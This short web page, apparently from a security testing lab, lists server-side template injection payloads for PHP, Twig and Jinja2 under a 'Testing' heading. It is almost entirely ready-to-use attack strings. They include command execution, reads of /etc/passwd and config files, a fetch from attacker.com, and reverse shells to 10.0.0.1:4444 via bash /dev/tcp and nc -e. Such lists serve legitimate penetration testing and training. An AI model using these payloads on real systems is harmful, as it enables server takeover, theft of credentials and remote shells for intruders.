🎨 SSTI (Server-Side Template Injection) Testing

← Back to Home

1. Simple Template Injection

Basic Payloads: • ${7*7} • #{7*7} • {{7*7}} • ${system('whoami')} • ${phpinfo()} • ${passthru('dir')}

2. Advanced Template Injection

PHP SSTI Payloads: Code Execution: • ${system('whoami')} • ${exec('whoami')} • ${shell_exec('dir')} • ${passthru('net user')} • ${`whoami`} File Operations: • ${file_get_contents('/etc/passwd')} • ${readfile('config.php')} • ${file_get_contents('http://attacker.com/shell.txt')} PHP Info: • ${phpinfo()} • ${phpversion()} • ${get_defined_functions()} Reverse Shell: • ${system('bash -i >& /dev/tcp/10.0.0.1/4444 0>&1')} • ${exec('nc -e /bin/sh 10.0.0.1 4444')} Twig SSTI (if Twig is used): • {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}} • {{['id']|filter('system')}} • {{['cat /etc/passwd']|filter('system')}} Jinja2 SSTI (Python): • {{config.items()}} • {{''.__class__.__mro__[1].__subclasses__()}} • {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}